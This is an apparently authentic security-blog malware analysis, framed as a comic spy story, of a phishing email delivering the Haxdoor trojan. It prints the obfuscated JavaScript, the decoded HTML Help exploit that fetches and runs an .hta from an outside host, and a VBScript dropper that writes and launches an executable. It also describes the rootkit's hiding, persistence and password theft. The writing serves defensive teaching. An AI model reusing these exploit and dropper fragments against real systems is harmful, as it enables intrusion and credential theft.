Threat Level: green Handler on Duty: Pedro Bueno

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Follow the Bouncing Malware IX: eGOLDFINGER

Published: 2005-09-22
Last Updated: 2005-09-22 12:58:33 UTC
by Tom Liston (Version: 2)
0 comment(s)

The Spy Who Bugged Me

Cigarette smoke hung around the lampshade like a bad memory and the watery light from the low wattage bulb made the cheap coffeehouse tabletop look somehow cheaper.  It was late afternoon and, as I relaxed back into the leather of the booth's seat and took a long, slow draw on my double-mocha latte with extra whipped cream, I gave the little barista hottie my most smoldering "come hither" look.  No one was more surprised than me when she actually came hither.

"Look, Mister," she began, snapping her gum seductively; "you can't just sit here all afternoon nursing one lousy cup of coffee.  You have to buy something."

She wanted me.  It was obvious.

And why not?  All women want me, for I am Sixpack... Joe Sixpack, Agent 008.

[Insert long, surreal opening credit sequence, with scantily clad models prancing about to '60s music, while seductively caressing handguns.]

[Nope... nothin' Freudian about that...]

Careful not to blow my cover story (a middle-aged, balding, overweight insurance salesman on a junket to the home-office in Duluth, MN for training) I dialed back on "suave and debonair" to better fit the part:

"Uh... Look, uh... I'm from out of town and my wife only gave me so much money to spend each day... and she'll be really mad if I..."

"Buy something or get out.  You can't just come in here and sit at our tables and use the free wireless all afternoon.  You have to buy something."

"Look, this isn't even my laptop.  I borrowed it from my boss.  He told me that I..."

"Are you going to buy something, or do I have to call the cops?"

"Ok.  Fine.  I'll order something.  What's the cheapest thing you sell?"

Both the way she rolls her eyes, and her long, drawn-out sigh scream "I want you."  She can barely contain herself as she takes my order for a kid-sized fruit punch.  I sense a shiver of ecstasy run through her body when, as she is walking back to the counter, I add "Shaken, not stirred."

I return my attention to the matter at hand.  The evil minions of SPECTRE have hidden several explosive devices within a grid conveniently displayed on the "borrowed" laptop's screen.  It is my mission to find out where they are and mark them.  It is a delicate task, but Joe Sixpack, Agent 008, is up to the challenge.

Just as I was poised to place a flag marking the position of another of the explosive devices, a small voice speaks to me.  

Every secret agent counted on that small, still voice inside to warn them when something wasn't right... when danger lurked nearby.  But this wasn't that voice.  This was an inane, stupidly-chipper voice that said "You've got mail!" in a tone normally reserved for saying things like "You've won a Nobel Prize."

"Hey, Mr. Trump, you've got mail," said the sultry coffee-serving wench, undressing me with her eyes as she placed my cup of DomJuicyJuice on the table next to me.  "I don't suppose you'll be ordering anything else..."

"Only later tonight, when I have you in my bed," I think to myself while quickly saying "No."

At the bottom of the screen, in the System Tray, there is a little red envelope flashing at me: obviously, a new, Top Secret, Eyes-Only message.  I glance around, acting, for all who might be watching, exactly like some guy who was about to open the email program that his boss accidentally left running on his borrowed laptop.

The place is empty, except for me and my hunka-hunka-burnin' barista love, but you can never be too careful.  A double-click on the envelope brings up the Ultra Top Secret Messaging Interface, cleverly disguised as an outdated version of Outlook Express.

At the top of the screen, I see the new message.  In bold, the subject reads: "Notification of e-gold account update."  

I clear my throat, a few dozen times, and casually say "Yep... those e-gold folks.  What a pain they are... constantly after me about updating my account information.  It just never ends..."

Obviously left speechless in the presence of such a worldly yet attractive member of the opposite sex, my scalding-hot coffee-girl can only make a loud, yet feminine, snorting noise.

"I thought you said that the laptop belonged to your boss."

"Did I?  Uh... no.  No.  It's mine.  All mine.  One of several that I own, in fact," I stammer.  As if to prove my point, I double-click on the email, opening it.

The email itself is pretty much of a disappointment-no text, no nothing.  It was probably just some sort of mistake.  For a moment, I think I see some strange flashing of windows, but I'm suddenly distracted as my Caffeine-Queen speaks:

"Why did you say that?" she asks.

"Say what?"

"You know... the stuff about e-gold and owning a bunch of laptops.  Why did you say that?  Are you trying to impress me or something?  Do you think that you can walk your bland, chubby, middle-aged self in here, order the cheapest thing on the menu so you can use our wireless, and then toss out some bull about owning gold and laptops and impress me?"

"I was only trying to make conversation..." I explain.

"Well don't," she says, looking suddenly like some evil arch-villain.  "I don't expect you to talk, Mr. Bland... I expect you to buy."

From Russia With Love

While Agent 008 might have thought the email that he opened was a "disappointment," like any good spy thriller, there was a lot more going on behind the scenes.  While there wasn't any text to the email, it did deliver a top secret message.

Hidden within the email was the following JavaScript:

<html><script>var a='%<a whole bunch of stuff edited>';
var e=256,x=0,o="",t=new Array(4113),s="—<style>#—x2<edited>";
function g(s,f){if(s.length<=x)return e;
else{if(f){return s.charAt(x++);}else{return a.indexOf(s.charAt(x++));
}}}function d(){var i,j,k,c,r=4078,l=0,os="",ar,ic=0;ar=new Array();
for(i=0;i<4078;i++)t[i]=" ";for(;;){if(((l>>=1)&256)==0)
{if((c=g(s,0))==e)break;l=c|65280;}if(l&1){if((c=g(s,1))==e)break;
os+=c;t[r++]=c;r&=4095;}else{if((i=g(s,0))==e)break;
if((j=g(s,0))==e)break;i|=((j&240)<<4);j=(j&15)+2;
for(k=0;k<=j;k++){c=t[(i+k)&4095];os+=c;t[r++]=c;r&=4095;}}
if(os.length>80){ar[ic++]=os;os="";}}o=ar.join("")+os;}d();
document.writeln(o);document.close();
</script></head><body
onLoad='window.status="<edited>                                 ."'>
</body></html>

Note: several of the character strings have been <edited> as indicated.

Several FTBMs ago, kindly ol' doctor Tom told you how to deal with encoded JavaScript like this.  I showed you a very Zen-like technique that used the script itself to do the decoding for you.  Well... forget it.  I now have an even easier way to show you, so sit back and take notes as Dr. Tom shows you how to mess up a malware author's day.

Doctor! No!

The technique I described before used a FileSystemObject to create a text file that contained the dumped output of the obfuscated JavaScript.  Doing that was rather a pain, required that you edit the JavaScript in several places and... well, let's just stick with "it was a pain."  Here's a much easier way.

Look through the JavaScript and find where it is that they're actually dumping the results of their decoding function back into the document.  It'll most likely be a call to either document.write() or document.writeln().  What is happening is that the JavaScript is actually writing the new, decoded HTML / JavaScript back into the live document so it can be interpreted by your browser's parser on the fly.  What we want to do is find a way to short-circuit that parsing and allow the results to be displayed rather than interpreted by the browser.  The easiest way to do that is to have the decoded output displayed by an HTML construct called a <textarea>.

In the above code, this can be accomplished by putting the following before the call to document.writeln(o):

document.write("<textarea cols=100 rows=100>");

and the following immediately after:

document.write("</textarea>");

You then fire off the resulting JavaScript in a browser, and it will display the code that it would've normally interpreted.  And just-like-that, someone's hard work to obfuscate their code falls apart.  

Note: Never, ever, ever ,ever, do this on a "live" production machine.  Only ever play with malware on an isolated lab machine that you're ready, willing, and able to reformat at the drop of a hat.  Remember: if you mess up, I'll send sharks with frickin' laser beams on their heads over to get you.

Doing that, we find that the obfuscated stuff is actually:

<style>#x2,#x3{position:absolute;left:-1000;}</style>
<OBJECT id=x2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<param name="Scrollbars" value="true">
<PARAM NAME="Item1"
VALUE="command;ms-its:icwdial.chm::/icw_overview.htm">
</OBJECT>
<script>x2.HHClick();</script>
<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<PARAM NAME="Item1" VALUE="command;javascript:document.links[0].href='
EXEC=,mshta,http://www.date4me2.com/images/x.hta  CHM=ieshared.chm
FILE=app_install.htm'%3Bdocument.links[0].click();">
</OBJECT>
<script>setTimeout('x3.HHClick();',1000);setTimeout('window.close();',1200);
</script>
</html>

This is an exploit aimed at a vulnerability in HTML Help (patched by MS05-001) that can be used to execute arbitrary code.  In this case, it attempts to download and launch another HTML file called x.hta.

License To Kill

The file x.hta looks like a very much larger version of the original email message, re-using much of the same code found at the end of the JavaScript, and replacing only the information in the variables.  Decoding is done in the same manner as before, and results in the following:

<HTML><HEAD>
<TITLE>Microsoft Update Wizard</TITLE>
<HTA:APPLICATION id=MSUpdate
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<BODY><NOSCRIPT>To display this page you need a browser with JavaScript support.</NOSCRIPT>
<SCRIPT language="VBScript">
self.MoveTo 6000,6000
Dim IESetup
Dim o(788)
o(0)="4d5a00<edited>"
o(1)="000040<edited>"
.
.
.
783 lines removed...
.
.
.
o(786)="e8564e<edited>"
o(787)="5a6f37<edited>"
set wshProcEnv=MSplay.environment("process")
f=wshProcEnv("TEMP") + "msdtc.exe"
set IESetup=MSmedia.CreateTextFile(f, TRUE)
For j=0 To 787
o_Size=Len(o(j))
For k=1 To (o_Size-1) Step 2
Exe_Byte=Mid(o(j),k,2)
Exe_Byte="&H"+Exe_Byte
IESetup.Write(Chr(Exe_Byte))
Next
Next
IESetup.Close()
MSplay.Run(f),1,TRUE
MSmedia.DeleteFile(f)
self.Close
</SCRIPT>
</BODY></HTML>

Note: Again, some values have been <edited>.
                      
Those of you with taped, horn-rimmed glasses who were in the AV club in Jr. High will note that the numbers assigned to o(0) look strangely familiar.  They're the hex equivalents of the "magic values" that begin every program on the PC (extra-credit: anyone know what they stand for?).

Yep, the decoded JavaScript is simply building a Win32 executable out of whole cloth... ie. it is simply writing out an executable binary based on hex values stored into an array in the source code.  If we remove these lines (which launch and then delete the file...):

MSplay.Run(f),1,TRUE
MSmedia.DeleteFile(f)

and load the HTML in a browser, we end up with the file "msdtc.exe" wherever we have "TEMP" assigned.

The file msdtc.exe is a 50,425 byte long FSG-packed Win32 executable that is chock full o'Evil.  (Note: that is evil with a capital "E").  It is recognized, by several antivirus products, as Haxdoor.DW, and categorized as a Trojan/Backdoor.

A View To A Kill

Launching msdtc.exe on a test box results in no visible action (beyond a blinking drive light... hmmm...).  Monitoring the action of the software tells us that it installs the following files:

C:\WINDOWS\system32\avpx32.dll
C:\WINDOWS\system32\qz.dll
C:\WINDOWS\system32\avpx64.sys
C:\WINDOWS\system32\qz.sys
C:\WINDOWS\system32\avpx32.sys
C:\WINDOWS\system32\qy.sys
C:\WINDOWS\system32\ps.a3d

it also appeared to copy the Windows SAM information to a file called SSL.

The funny thing is, when I went to look for those files on my test machine, they weren't there.  Huh, I thought... I *know* that they were created...

Hmmm... a mystery.

The ".sys" ending of some of those files was my first clue.  Files with the .sys extension are generally drivers on Windows, and so it would appear that what we have here is (rather than a failure to communicate) a Win32 rootkit-like entity that is hiding the existence of these files.

Sure enough, rebooting the system using a Linux bootable CD, I can see the files sitting in the system32 directory... If I boot normally under Windows, they're "not there."

Cool.

Very, very cool.

(Note: Please don't take that the wrong way.  When it comes to the folks who write things like this... their morals go so far beyond "twisted" that perhaps they're "sprained."  In spite of that, you have to admit... this is pretty darned cool stuff...)

For Your Eyes Only

In any case, this little bugger has more than a few tricks up its sleeve:

It installs itself as two "LegacyDrivers" called "AVPX TCP" (avpx32.sys) and "AVPX64 TCP" (avpx64.sys).  From this vantage point, it controls the information that system calls (such as those used to enumerate files within the file system and enumerate keys within the registry) will and will not be allowed to return.  It hides both the files that it creates and the registry keys that are used to launch and control them.  It isn't "directory specific" when it masks files: for instance, if you use notepad to create a file on the desktop called avpx32.dll, the file disappears.  Even though the file doesn't show up in a directory listing, trying to create another file with the same name results in a "file exists, replace?" prompt.

It does this by having avpx32.dll injected into essentially every running process.

It turns off memory write protection in the registry, allowing it free reign to overwrite portions of memory and it installs registry values under the HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot key to force itself to run even in Safe Mode.

Yes... you read that correctly: even in Safe Mode.

It sets up a listening process on TCP ports 7080, 8008, and 16661.  It does not appear to hide these open ports, or at least it didn't do a very good job of hiding them.  With the correct "logon sequence," connections to these backdoor ports will allow a remote "user" to:

Download and execute files
Steal passwords stored in Protected Storage
Steal any cached passwords
Steal dialup connection information
Log keystrokes

If that wasn't Evil enough, it steals information from Internet Explorer's URL cache by looking for strings that contain: "ebay.com", "paypal.c" or "e-gold.c"

It also takes the now passť step of blocking access to antivirus vendor websites.

And finally, as if to prove that Evil has no bounds, if you happen to actually have an e-gold account (remember, this all started off as an e-gold related spam...) it tries to steal even more information about you by logging into e-gold using the information that it found on your machine.

Somewhere out there, there's a seriously Type-A malware author that should be switching to decaf...

-Tom Liston - Intelguardians Network Intelligence, LLC
Keywords:
0 comment(s)
Diary Archives